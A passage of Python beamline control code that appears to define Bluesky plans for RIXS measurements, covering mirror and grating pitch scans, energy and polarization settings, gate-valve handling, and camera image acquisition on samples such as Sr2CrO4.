#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': m6_pit = ' + str(x_ideal) + \
# ' , m7_pit = ' + str(y_ideal) + '\n'
yield from mv(gvbt1,'close')
print (f_string)
def rixscam_m6_pit_optimization2_centroid(num_scan):
#according to joe's calcs, 0.5mrad makes a signf change. this is 0.028 deg in m6
# beyond +/- 0.25deg it could be very difficult to see something...especially if focusing well.
precison_digit = 4
gr_pit=round(espgm.grpit.user_readback.value,precison_digit)
extra_md = 'gr = {}'.format(gr_pit)
#NOTE : grating:m7
m7_dict={6.2476:5.7229}
x_motor=m6.pit
x_ideal= 1.3777
x_start= x_ideal+5*.001
x_stop= x_ideal-5*.001
y_motor=espgm.m7pit
y_ideal = m7_dict[gr_pit]
y_start= y_ideal+5*.001
y_stop= y_ideal-5*.001
num = 11
f_string=''
yield from count([rixscam], num=1)
yield from mv(gvbt1,'open')
for i in range(num):
x_val = round (x_start + i * (x_stop - x_start) / (num - 1) , precison_digit)
y_val = round (y_start + i * (y_stop - y_start) / (num - 1) , precison_digit)
yield from mv (x_motor,x_val,y_motor,y_val)
yield from sleep(10)
for i in range(num_scan):
uid = yield from count([rixscam],num=1, md = {'reason':'{} m6 first order focus - 20um vg'.format(extra_md)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': m6_pit = ' + str(x_val) + \
' , m7_pit = ' + str(y_val) + '\n'
yield from mv(gvbt1,'close')
print (f_string)
def rixscam_gr_m6_pit_optimization2():
yield from align.m1pit
yield from m3_check()
gr_list = [5.4945, 5.5945, 5.6945, 5.7945, 5.8945]
for gr in gr_list:
yield from mv(espgm.grpit, gr)
yield from rixscam_m6_pit_optimization2()
def rixscam_m7_gr_2_axis( extra_md = ' '):
precison_digit = 4
y_motor= espgm.m7pit
#y_ideal= 4.8445#5.5349
#y_start = 4.7971#4.7813#5.4959
#y_stop = 4.8919#5.5734
y_ideal = 5.086414
y_start = 5.036414
y_stop = 5.136414
x_motor= espgm.grpit
#x_ideal= 4.9281#6.2368
#x_start= 4.8981#4.8881#6.2168
#x_stop= 4.9581#6.2568
x_ideal= 5.2939
x_start= 5.2639
x_stop = 5.3229
num= 14 #12
f_string=''
yield from count([rixscam,sclr], md = {'reason':'dummy'})
for i in range(num):
x_val = round (x_start + i * (x_stop - x_start) / (num - 1) , precison_digit)
y_val = round (y_start + i * (y_stop - y_start) / (num - 1) , precison_digit)
yield from mv (x_motor,x_val,y_motor,y_val)
#yield from mv(gvbt1,'open')
uid = yield from count([rixscam,sclr],num=1, md = {'reason':' m7-gr scan {}'. format(extra_md)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': gr_pit = ' + str(x_val) + \
' , m7_pit = ' + str(y_val) + '\n'
#yield from mv(gvbt1,'close')
#yield from mv(gvbt1,'open')
#yield from mv(gvsc1,'close')
#uid = yield from count([rixscam,sclr],num=1, md = {'reason':'gv:sc1 dark'})
#if uid == None:
# uid = -1
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dark \n'
#yield from mv(x_motor,x_ideal,y_motor, y_ideal)
#yield from mv(gvsc1,'open')
#uid = yield from count([rixscam],num=1, md = {'reason':'returned to center'})
#if uid == None:
#uid = -1
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': gr_pit = ' + str(x_ideal) + \
# ' , m7_pit = ' + str(y_ideal) + '\n'
yield from mv(gvbt1,'close')
print (f_string)
def rixscam_m7_gr_2_axis_centroid_temp(cts, num_scans=1, extra_md = ' '):
precison_digit = 4
y_motor= espgm.m7pit
#y_ideal= 4.8445#5.5349
#y_start = 4.7971#4.7813#5.4959
#y_stop = 4.8919#5.5734
y_ideal = 5.3915
y_start = 5.3915-0.004*6
y_stop = 5.3915+0.004*6
x_motor= espgm.grpit
#x_ideal= 4.9281#6.2368
#x_start= 4.8981#4.8881#6.2168
#x_stop= 4.9581#6.2568
x_ideal= 6.0139
x_start= 6.0139-0.002*6
x_stop = 6.0139+0.002*6
num= 13
f_string=''
#yield from count([rixscam], md = {'reason':'dummy'})
yield from mv(gvbt1,'open')
for i in range(num):
x_val = round (x_start + i * (x_stop - x_start) / (num - 1) , precison_digit)
y_val = round (y_start + i * (y_stop - y_start) / (num - 1) , precison_digit)
yield from mv (x_motor,x_val,y_motor,y_val)
for s in range(num_scans):
uid = yield from count([rixscam],num=cts, md = {'reason':' m7-gr scan {}'. format(extra_md)})
if uid is None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': gr_pit = ' + str(x_val) + \
' , m7_pit = ' + str(y_val) + '\n'
yield from mv(gvbt1,'close')
print (f_string)
def rixscam_m7_gr_2_axis_v1( extra_md = ' '):
precison_digit = 4
y_motor= espgm.m7pit
y_ideal= 5.543500
y_list = [5.3433,5.5433,5.7303,5.9003]
x_motor= espgm.grpit
x_ideal= 6.238500
x_list=[6.1385,6.2385,6.3385,6.4385]
num= 4 #12
f_string=''
yield from mv(rixscam.cam.acquire_time, 300)
yield from count([rixscam,sclr], md = {'reason':'dummy'})
for i in range(num):
x_val = x_list[i]
y_val = y_list[i]
yield from mv (x_motor,x_val,y_motor,y_val)
yield from mv(gvbt1,'open')
uid = yield from count([rixscam,sclr],num=1, md = {'reason':' m7-gr scan {}'. format(extra_md)})
if uid is None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': gr_pit = ' + str(x_val) + \
' , m7_pit = ' + str(y_val) + '\n'
yield from mv(gvbt1,'close')
yield from mv(gvbt1,'open')
yield from mv(gvsc1,'close')
uid = yield from count([rixscam,sclr],num=1, md = {'reason':'gv:sc1 dark'})
if uid is None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dark \n'
#yield from mv(x_motor,x_ideal,y_motor, y_ideal)
yield from mv(gvsc1,'open')
#uid = yield from count([rixscam],num=1, md = {'reason':'returned to center'})
#if uid == None:
#uid = -1
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': gr_pit = ' + str(x_ideal) + \
# ' , m7_pit = ' + str(y_ideal) + '\n'
yield from mv(gvbt1,'close')
print (f_string)
def rixscam_cff_m7_gr():
#cffs = [2.22,2.24,2.25,2.26,2.27,2.28,2.29,2.30,2.32,2.34] # for mbg
cffs = [2.10,2.12,2.14,2.16,2.18,2.20,2.22,2.24,2.26] # for mbg
#yield from mv(sclr.preset_time, 180)
#yield from mv(extslt.vg, 10)
#extslt_vg = np.round(extslt.vg.user_readback.value,1)
#yield from mv(rixscam.cam.acquire_time, 180)
for cff in cffs:
yield from mv(pgm.cff, cff)#Fcryo_z
yield from sleep(10)
yield from mv(pgm.en, 1085)
#yield from rixscam_m7_gr_2_axis(extra_md = np.str(cff)+np.str(extslt_vg))
#yield from mv(sclr.preset_time, 1)
yield from mv(rixscam.cam.acquire_time, 5)
#yield from count([rixscam,sclr])
yield from count([rixscam])
def rixscam_pgm_en(extra_md = '' ):
"""
Looks like 50um extslt_vg is typical.
"""
x_motor=pgm.en
x_ideal = 1095 #462 #852.4 #1250lmm
x_start = 1060 #451 #821.4 #1250lmm
x_stop = 1130 #465
num = 6 #8
cts=60
#yield from m1m3_max()
extslt_vg_value = np.round(extslt.vg.user_readback.value,0)
yield from mv(gvbt1,'open')
f_string=''
yield from count([rixscam], md={'reason':'dummy'})
for i in range(num):
x_val = round (x_start + i * (x_stop - x_start) / (num - 1) , 2)
yield from mv (x_motor,x_val)
uid = yield from count([rixscam, ring_curr], num=cts, md = {'reason':'{} energy calibration - {}um vg'.format(extra_md, extslt_vg_value)})
#uid = yield from count([rixscam],num=1, md = {'reason':'{} energy calibration - {}um vg'.format(extra_md, extslt_vg_value)})
if uid is None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': pgm_en = ' + str(x_val) + '\n'
yield from mv(gvbt1,'close')
print (f_string)
yield from mv(x_motor,x_ideal)
def rixscam_m4slt(extra_md = '1800 + 2500 set' ):
vgs = [1]
hgs = [1.5]
eslt = [10]
num=4
extslt_vg_value = np.round(extslt.vg.user_readback.value,0)
yield from mv(gvbt1,'open')
f_string=''
yield from count([rixscam], md={'reason':'dummy'})
for i in range(num):
#x_val = round (x_start + i * (x_stop - x_start) / (num - 1) , 2)
#yield from mv (x_motor,x_val)
uid = yield from count([rixscam],num=1, md = {'reason':'{} energy calibration - {}um vg'.format(extra_md, extslt_vg_value)})
if uid is None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + '\n' # pgm_en omitted: the motor move above is commented out
yield from mv(gvbt1,'close')
yield from mv(rixscam.cam.acquire_time, 5)
yield from count([rixscam],num=1, md = {'reason':'dummy'})
print (f_string)
#yield from mv(x_motor,x_ideal)
def rixscam_energies(extra_md = '' ):
yield from mv(extslt.vg,30)
yield from pol_H()
f_string=''
yield from mv(espgm.m7pit,5.4210)
i = 576.5
yield from mv(pgm.en, i)
yield from align.m1pit
yield from m3_check()
yield from mv(gvbt1,'open')
for j in range (0, 12):
yield from mvr(cryo.y,-0.01)
uid = yield from count([rixscam],num=1, md = {'reason':' Sr2CrO4 - E = {} eV - Pol H'. format(i)})
if uid is None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(i) + '\n'
yield from mv(gvbt1,'close')
#yield from align.m1pit
#yield from m3_check()
#for j in range (0, 12):
# yield from mvr(cryo.y,-0.01)
# uid = yield from count([rixscam],num=1, md = {'reason':' Sr2CrO4 - E = {} eV - Pol H'. format(i)})
# if uid == None:
# uid = -1
# f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(i) + '\n'
#yield from mv(gvbt1,'close')
yield from mv(espgm.m7pit,5.4305)
i = 579.3
yield from mv(pgm.en, i)
yield from align.m1pit
yield from m3_check()
yield from mv(gvbt1,'open')
for j in range (0, 12):
yield from mvr(cryo.y,-0.01)
uid = yield from count([rixscam],num=1, md = {'reason':' Sr2CrO4 - E = {} eV - Pol H'. format(i)})
if uid is None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(i) + '\n'
yield from mv(gvbt1,'close')
#yield from align.m1pit
#yield from m3_check()
#for j in range (0, 12):
# yield from mvr(cryo.y,-0.01)
# uid = yield from count([rixscam],num=1, md = {'reason':' Sr2CrO4 - E = {} eV - Pol H'. format(i)})
# if uid == None:
# uid = -1
# f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(i) + '\n'
#yield from mv(gvbt1,'close')
yield from mv(espgm.m7pit,5.4385)
i = 580.5
yield from mv(pgm.en, i)
yield from align.m1pit
yield from m3_check()
yield from mv(gvbt1,'open')
for j in range (0, 12):
yield from mvr(cryo.y,-0.01)
uid = yield from count([rixscam],num=1, md = {'reason':' Sr2CrO4 - E = {} eV - Pol H'. format(i)})
if uid is None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(i) + '\n'
yield from mv(gvbt1,'close')
#yield from align.m1pit
#yield from m3_check()
#for j in range (0, 12):
# yield from mvr(cryo.y,-0.01)
# uid = yield from count([rixscam],num=1, md = {'reason':' Sr2CrO4 - E = {} eV - Pol H'. format(i)})
# if uid == None:
# uid = -1
# f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(i) + '\n'
#yield from mv(gvbt1,'close')
yield from mv(gvbt1,'open')
yield from mv(gvsc1,'close')
for i in range(0,3):
uid = yield from count([rixscam],num=1, md = {'reason':'gv:sc1 dark'})
if uid is None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dark \n'
yield from mv(gvbt1,'close')
yield from mv(gvsc1,'open')
print (f_string)
def rixscam_acquire(detectors, Ei_vals, m7_pit_vals, num_rixs_im, pol_type=None, extra_md = ' ' ):
"""
Parameters
----------
detectors : list
detectors to be used with the rixs spectra
Ei_vals : list
beamline incident energies
m7_pit_vals : list or None
espgm.m7pit values for each pgm.en value;
if None, m7 pitch is not adjusted
num_rixs_im : integer
number of RIXS images taken before every beamline alignment
pol_type : None, 'H', or 'V'
polarization H or V; offsets are assumed already set and need to be updated
extra_md : string
optional note to be added to the rixs light image data
"""
if pol_type == 'H':
yield from pol_H(0) #TODO fix this - find a better way in profile to manage this
elif pol_type == 'V':
yield from pol_V(3) #TODO fix this - find a better way in profile to manage this
elif pol_type is None:
if np.round(epu1.phase.position,1) == 0.0:
pol_type = 'H'
elif np.round(epu1.phase.position,1) == 28.5:
pol_type = 'V'
else:
print('You forgot to specify the polarization type (pol_type) or the epu1.phase is not as expected.')
print('Checking m7 now')
if m7_pit_vals is not None:
print('\tm7 is okay')
if len(Ei_vals) == len(m7_pit_vals):
pass
else:
print('\n\nInvalid parameters for incident energy and m7 pitch: \n\tEnergy and pitch list lengths are: {} and {}, respectively.\n'.format(len(Ei_vals), len(m7_pit_vals)))
raise ValueError('Ei_vals and m7_pit_vals must have the same length')
print('\n\nStarting plan for {} polarized light with {} rixs images for each Ei = {}\n\n'.format(pol_type,num_rixs_im,Ei_vals))
f_string=''
md_string = 'no md string yet'
yield from count(detectors, md = {'reason':'dummy'})
print('Ya dummy')
for i in range(len(Ei_vals)):
yield from mv(pgm.en, Ei_vals[i])
if m7_pit_vals is not None:
yield from mv(espgm.m7pit, m7_pit_vals[i])
yield from mv(gvbt1,'open')
#scan_num_cor = 2+2*i
print('\t\tTaking Lights for RIXS Now')
#LIGHTS
for j in range(0, num_rixs_im):
yield from mvr(cryo.y,-0.005)
print('\t\tTaking Lights for RIXS REALLY')
md_string = str(extra_md) + ' - E = ' + str(np.round(Ei_vals[i],3)) + 'eV - Pol ' + str(pol_type)
uid = yield from count(detectors,num=1, md = {'reason':'{}'. format(md_string)})
#uid = yield from count([rixscam],num=1, md = {'reason':'{} - E = {:3.3f}eV - Pol {}'. format(extra_md, Ei_vals[i], pol_type)})
if uid is None:
uid = db[-1].start['scan_id']#+1+j+scan_num_cor
f_string += 'scan no ' + str(uid) + ' ' + str(md_string) + '\n'
#print(md_string)
#f_string += 'scan no ' + str(uid) + ': E = ' + str(np.round(Ei_vals[i],3)) + '\n'
else:
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ' ' + str(md_string) + '\n'
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(np.round(Ei_vals[i],3)) + '\n'
yield from mv(gvbt1,'close')
#DARKS
#yield from mv(gvbt1,'open')
#yield from mv(gvsc1,'close')
#for i in range(0,2):
#uid = yield from count(detectors,num=1, md = {'reason':'gv:sc1 dark'})
#if uid == None:
# uid = -1
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dark \n'
#yield from mv(gvbt1,'close')
yield from mv(gvsc1,'open')
#print(f_string)
#print('\n\n EXAMPLE METADATA FOR SCAN:\n\t {}\n\n'.format(md_string))
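# Illustrative sketch (hypothetical helper, not called anywhere in this
# profile): rixscam_acquire builds its 'reason' metadata by concatenating the
# extra metadata, the rounded incident energy, and the polarization, e.g.
# 'Sr2CrO4 - E = 575.0eV - Pol H'. The same format as a pure function:
def build_md_string(extra_md, Ei, pol_type):
    """Return a reason string in the format used by the acquire plans."""
    return '{} - E = {}eV - Pol {}'.format(extra_md, round(Ei, 3), pol_type)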
def rixscam_acquire_sample_c_tape(Ei_vals, m7_pit_vals, sample, c_tape, num_rixs_im, pol_type=None, extra_md = ' ' ):
"""
Parameters
----------
Ei_vals : list
beamline incident energies
m7_pit_vals : list or None
espgm.m7pit values for each pgm.en value;
if None, m7 pitch is not adjusted
sample : list
[cryo.x, cryo.y, cryo.z] position of the sample
c_tape : list
[cryo.x, cryo.y, cryo.z] position of the carbon-tape reference
num_rixs_im : integer
number of RIXS images taken before every beamline alignment
pol_type : None, 'H', or 'V'
polarization H or V; offsets are assumed already set and need to be updated
extra_md : string
optional note to be added to the rixs light image data
"""
print('\n\n\tEnsuring beamline exit slit vertical gap is at 20 um\n\n')
yield from mv(extslt.vg,20, extslt.hg, 150)
if pol_type == 'H':
yield from pol_H(0) #TODO fix this - find a better way in profile to manage this
elif pol_type == 'V':
yield from pol_V(3) #TODO fix this - find a better way in profile to manage this
elif pol_type is None:
if np.round(epu1.phase.position,1) == 0.0:
pol_type = 'H'
elif np.round(epu1.phase.position,1) == 28.5:
pol_type = 'V'
else:
print('You forgot to specify the polarization type (pol_type) or the epu1.phase is not as expected.')
print('Checking m7 now')
if m7_pit_vals is not None:
print('\tm7 is okay')
if len(Ei_vals) == len(m7_pit_vals):
pass
else:
print('\n\nInvalid parameters for incident energy and m7 pitch: \n\tEnergy and pitch list lengths are: {} and {}, respectively.\n'.format(len(Ei_vals), len(m7_pit_vals)))
raise ValueError('Ei_vals and m7_pit_vals must have the same length')
print('\n\nStarting plan for {} polarized light with {} rixs images for each Ei = {}\n\n'.format(pol_type,num_rixs_im,Ei_vals))
f_string=''
md_string = 'no md string yet'
yield from count([rixscam], md = {'reason':'dummy'})
print('Ya dummy')
for i in range(len(Ei_vals)):
yield from mv(pgm.en, Ei_vals[i])
if m7_pit_vals is not None:
yield from mv(espgm.m7pit, m7_pit_vals[i])
yield from mv(gvbt1,'open')
#scan_num_cor = 2+2*i
print('\t\tTaking Lights for RIXS Now')
#LIGHTS
for j in range(0, num_rixs_im):
#SAMPLE POSITION
yield from mv(cryo.x,sample[0])
yield from mv(cryo.y,sample[1]-0.002*i)
yield from mv(cryo.z,sample[2])
print('\t\tTaking RIXS from the SAMPLE')
md_string = str(extra_md) + ' - E = ' + str(np.round(Ei_vals[i],3)) + 'eV - Pol ' + str(pol_type)
uid = yield from count([rixscam,qem11,qem12],num=1, md = {'reason':'{}'. format(md_string)})
if uid is None:
uid = db[-1].start['scan_id']
f_string += 'scan no ' + str(uid) + ' ' + str(md_string) + '\n'
#print(md_string)
#f_string += 'scan no ' + str(uid) + ': E = ' + str(np.round(Ei_vals[i],3)) + '\n'
else:
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ' ' + str(md_string) + '\n'
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(np.round(Ei_vals[i],3)) + '\n'
#C-tape POSITION
yield from mv(cryo.x,c_tape[0])
yield from mv(cryo.y,c_tape[1])
yield from mv(cryo.z,c_tape[2])
print('\t\tTaking RIXS from the C-tape')
md_string_2 = 'C - tape' + ' - E = ' + str(np.round(Ei_vals[i],3)) + 'eV - Pol ' + str(pol_type)
uid = yield from count([rixscam,qem11,qem12],num=1, md = {'reason':'{}'. format(md_string_2)})
if uid is None:
uid = db[-1].start['scan_id']
f_string += 'scan no ' + str(uid) + ' ' + str(md_string_2) + '\n'
#print(md_string_2)
#f_string += 'scan no ' + str(uid) + ': E = ' + str(np.round(Ei_vals[i],3)) + '\n'
else:
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(np.round(Ei_vals[i],3)) + '\n'
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ' ' + str(md_string_2) + '\n'
yield from mv(gvbt1,'close')
#DARKS
yield from mv(gvbt1,'open')
yield from mv(gvsc1,'close')
for i in range(0,2):
uid = yield from count([rixscam],num=1, md = {'reason':'gv:sc1 dark'})
if uid is None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dark \n'
yield from mv(gvbt1,'close')
yield from mv(gvsc1,'open')
print(f_string)
print('\n\n EXAMPLE METADATA FOR SCAN:\n\t {}\n\n'.format(md_string))
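# Illustrative sketch of the consistency check at the top of the acquire
# plans: when m7_pit_vals is a list, it must provide one espgm.m7pit value per
# incident energy. The function name check_pitch_list is hypothetical.
def check_pitch_list(Ei_vals, m7_pit_vals):
    """Return True when m7_pit_vals is None or matches Ei_vals in length."""
    return m7_pit_vals is None or len(Ei_vals) == len(m7_pit_vals)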
def rixscam_acquire_V2(Ei_vals, m7_pit_vals, num_rixs_im, pol_type=None, extra_md = ' ' ):
"""
Parameters
----------
Ei_vals : list
beamline incident energies
m7_pit_vals : list or None
espgm.m7pit values for each pgm.en value;
if None, m7 pitch is not adjusted
num_rixs_im : integer
number of RIXS images taken before every beamline alignment
pol_type : None, 'H', or 'V'
polarization H or V; offsets are assumed already set and need to be updated
extra_md : string
optional note to be added to the rixs light image data
"""
print('\n\n\tEnsuring beamline exit slit vertical gap is at 20 um\n\n')
yield from mv(extslt.vg,20, extslt.hg, 150)
try:
if pol_type == 'H':
yield from pol_H(0) #TODO fix this - find a better way in profile to manage this
elif pol_type == 'V':
yield from pol_V(3) #TODO fix this - find a better way in profile to manage this
elif pol_type is None:
if np.round(epu1.phase.position,1) == 0.0:
pol_type = 'H'
elif np.round(epu1.phase.position,1) == 28.5:
pol_type = 'V'
else:
print('You forgot to specify the polarization type (pol_type) or the epu1.phase is not as expected.')
raise ValueError('pol_type not specified and epu1.phase is not at an expected position')
print('Checking m7 now')
if m7_pit_vals is not None:
print('\tm7 is okay')
if len(Ei_vals) == len(m7_pit_vals):
pass
else:
print('\n\nInvalid parameters for incident energy and m7 pitch: \n\tEnergy and pitch list lengths are: {} and {}, respectively.\n'.format(len(Ei_vals), len(m7_pit_vals)))
raise ValueError('Ei_vals and m7_pit_vals must have the same length')
print('\n\nStarting plan for {} polarized light with {} rixs images for each Ei = {}\n\n'.format(pol_type,num_rixs_im,Ei_vals))
f_string=''
md_string = 'no md string yet'
yield from count([rixscam], md = {'reason':'dummy'})
print('Ya dummy')
for i in range(len(Ei_vals)):
yield from mv(pgm.en, Ei_vals[i])
if m7_pit_vals is not None:
yield from mv(espgm.m7pit, m7_pit_vals[i])
yield from mv(gvbt1,'open')
#scan_num_cor = 2+2*i
print('\t\tTaking Lights for RIXS Now')
#LIGHTS
for j in range(0, num_rixs_im):
yield from mvr(cryo.y,-0.002)
print('\t\tTaking Lights for RIXS REALLY')
md_string = str(extra_md) + ' - E = ' + str(np.round(Ei_vals[i],3)) + 'eV - Pol ' + str(pol_type)
uid = yield from count([rixscam],num=1, md = {'reason':'{}'. format(md_string)})
#uid = yield from count([rixscam],num=1, md = {'reason':'{} - E = {:3.3f}eV - Pol {}'. format(extra_md, Ei_vals[i], pol_type)})
if uid is None:
uid = db[-1].start['scan_id']#+1+j+scan_num_cor
f_string += 'scan no ' + str(uid) + ' ' + str(md_string) + '\n'
print(md_string)
#f_string += 'scan no ' + str(uid) + ': E = ' + str(np.round(Ei_vals[i],3)) + '\n'
else:
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ' ' + str(md_string) + '\n'
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(np.round(Ei_vals[i],3)) + '\n'
yield from mv(gvbt1,'close')
#DARKS
yield from mv(gvbt1,'open')
yield from mv(gvsc1,'close')
for i in range(0,2):
uid = yield from count([rixscam],num=1, md = {'reason':'gv:sc1 dark'})
if uid is None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dark \n'
yield from mv(gvbt1,'close')
yield from mv(gvsc1,'open')
print(f_string)
print('\n\n EXAMPLE METADATA FOR SCAN:\n\t {}\n\n'.format(md_string))
except Exception:
yield from mv(gvbt1,'close')
yield from mv(gvsc1,'open')
print('OOPS! The plan stopped. The completed scans are:\n')
print(f_string)
print('\n\nEXAMPLE METADATA FOR SCAN:\n\t {}\n\n'.format(md_string))
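# Illustrative sketch (hypothetical helper): when pol_type is None the acquire
# plans infer the polarization from epu1.phase -- a phase of 0.0 means
# horizontal, 28.5 means vertical, anything else is unrecognized.
def infer_pol_type(phase):
    """Map an epu1 phase position to 'H', 'V', or None if unrecognized."""
    phase = round(phase, 1)
    if phase == 0.0:
        return 'H'
    if phase == 28.5:
        return 'V'
    return None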
def rixscam_test_LV_LH(extra_md = '' ):
yield from mvr(cryo.y, -0.01)
x_motor=pgm.en
x_val=579.5
yield from mv(x_motor,x_val)
yield from pol_H(4)
# yield from align.m1pit
# yield from m3_check()
yield from mv(gvbt1,'open')
yield from count([rixscam])
f_string=''
for i in range(0,3):
uid = yield from count([rixscam],num=1, md = {'reason':' Sr2CrO4 - E = 579.5 eV - Pol H'})
if uid is None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': pgm_en = ' + str(x_val) + ' Pol H\n'
yield from mv(gvbt1,'close')
yield from pol_V(6)
# yield from align.m1pit
# yield from m3_check()
yield from mv(gvbt1,'open')
yield from count([rixscam])
for i in range(0,3):
uid = yield from count([rixscam],num=1, md = {'reason':' Sr2CrO4 - E = 579.5 eV - Pol V'})
if uid is None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': pgm_en = ' + str(x_val) + ' Pol V\n'
yield from mv(gvbt1,'close')
print (f_string)
yield from pol_H(4)
def rixscam_Ei_dep(extra_md = '' ):
yield from mv(extslt.vg,30)
yield from pol_H()
yield from align.m1pit
yield from m3_check()
f_string=''
yield from mv(espgm.m7pit,5.4210)
for i in np.arange(575,578,0.5):
yield from mv(pgm.en, i)
yield from mv(gvbt1,'open')
for j in range (0, 6):
yield from mvr(cryo.y,-0.01)
uid = yield from count([rixscam],num=1, md = {'reason':' Sr2CrO4 - E = {} eV - Pol H'. format(i)})
if uid is None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(i) + '\n'
yield from mv(gvbt1,'close')
yield from mv(espgm.m7pit,5.4305)
for i in np.arange(578,580,0.5):
yield from mv(pgm.en, i)
yield from mv(gvbt1,'open')
for j in range (0, 6):
yield from mvr(cryo.y,-0.01)
uid = yield from count([rixscam],num=1, md = {'reason':' Sr2CrO4 - E = {} eV - Pol H'. format(i)})
if uid is None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(i) + '\n'
yield from mv(gvbt1,'close')
yield from mv(espgm.m7pit,5.4385)
for i in np.arange(580,582.5,0.5):
yield from mv(pgm.en, i)
yield from mv(gvbt1,'open')
for j in range (0, 6):
yield from mvr(cryo.y,-0.01)
uid = yield from count([rixscam],num=1, md = {'reason':' Sr2CrO4 - E = {} eV - Pol H'. format(i)})
if uid is None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(i) + '\n'
#print(f_string)
yield from mv(gvbt1,'close')
yield from mv(gvbt1,'open')
yield from mv(gvsc1,'close')
for i in range(0,3):
uid = yield from count([rixscam],num=1, md = {'reason':'gv:sc1 dark'})
if uid is None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dark \n'
yield from mv(gvbt1,'close')
yield from mv(gvsc1,'open')
print (f_string)
yield from mv(pgm.en, 575)
yield from pol_V()
yield from sleep(300)
yield from align.m1pit
yield from m3_check()
f_string=''
yield from mv(espgm.m7pit,5.4210)
for i in np.arange(575,578,0.5):
yield from mv(pgm.en, i)
yield from mv(gvbt1,'open')
for j in range (0, 6):
yield from mvr(cryo.y,-0.01)
uid = yield from count([rixscam],num=1, md = {'reason':' Sr2CrO4 - E = {} eV - Pol V'. format(i)})
if uid is None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(i) + '\n'
yield from mv(gvbt1,'close')
yield from mv(espgm.m7pit,5.4305)
for i in np.arange(578,580,0.5):
yield from mv(pgm.en, i)
yield from mv(gvbt1,'open')
for j in range (0, 6):
yield from mvr(cryo.y,-0.01)
uid = yield from count([rixscam],num=1, md = {'reason':' Sr2CrO4 - E = {} eV - Pol V'. format(i)})
if uid is None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(i) + '\n'
yield from mv(gvbt1,'close')
yield from mv(espgm.m7pit,5.4385)
for i in np.arange(580,582.5,0.5):
yield from mv(pgm.en, i)
yield from mv(gvbt1,'open')
for j in range (0, 6):
yield from mvr(cryo.y,-0.01)
uid = yield from count([rixscam],num=1, md = {'reason':' Sr2CrO4 - E = {} eV - Pol V'. format(i)})
if uid is None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': E = ' + str(i) + '\n'
yield from mv(gvbt1,'close')
yield from mv(gvbt1,'open')
yield from mv(gvsc1,'close')
for i in range(0,3):
uid = yield from count([rixscam],num=1, md = {'reason':'gv:sc1 dark'})
if uid is None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dark \n'
yield from mv(gvbt1,'close')
yield from mv(gvsc1,'open')
print (f_string)
def rixscam_dc_z_optimization(extra_md = '' ):
x_motor= dc.z
x_ideal= 260
x_start= x_ideal + 12
x_stop= x_ideal - 12
num= 9 #12
yield from mv(gvbt1,'open')
f_string=''
yield from count([rixscam], md = {'reason':'dummy'})
yield from mv(gvbt1,'open')
for i in range(num):
x_val = round (x_start + i * (x_stop - x_start) / (num - 1) , 3)
yield from mv (x_motor,x_val)#,y_motor,y_val)
#yield from mv(gvbt1,'open')
uid = yield from count([rixscam],num=1, md = {'reason':' {}'. format(extra_md)})
if uid is None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dc_z = ' + str(x_val) + '\n'#\
# ' , m7_pit = ' + str(y_val) + '\n'
#yield from mv(gvbt1,'close')
yield from mv(gvsc1,'close')
#uid = yield from count([rixscam],num=1, md = {'reason':'gv:sc1 dark'})
#if uid == None:
# uid = -1
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dark \n'
#yield from mv(x_motor,x_ideal)#,y_motor, y_ideal)
yield from mv(gvsc1,'open')
#uid = yield from count([rixscam],num=1, md = {'reason':'returned to center'})
#if uid == None:
# uid = -1
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dc_z = ' + str(x_ideal) + '\n'#\
#' , m7_pit = ' + str(y_ideal) + '\n'
yield from mv(gvbt1,'close')
yield from mv (x_motor,x_ideal)
print (f_string)
def rixscam_dc_z_optimization_centroid(num_scan):
x_motor= dc.z
x_ideal= 260
x_start= x_ideal + 12
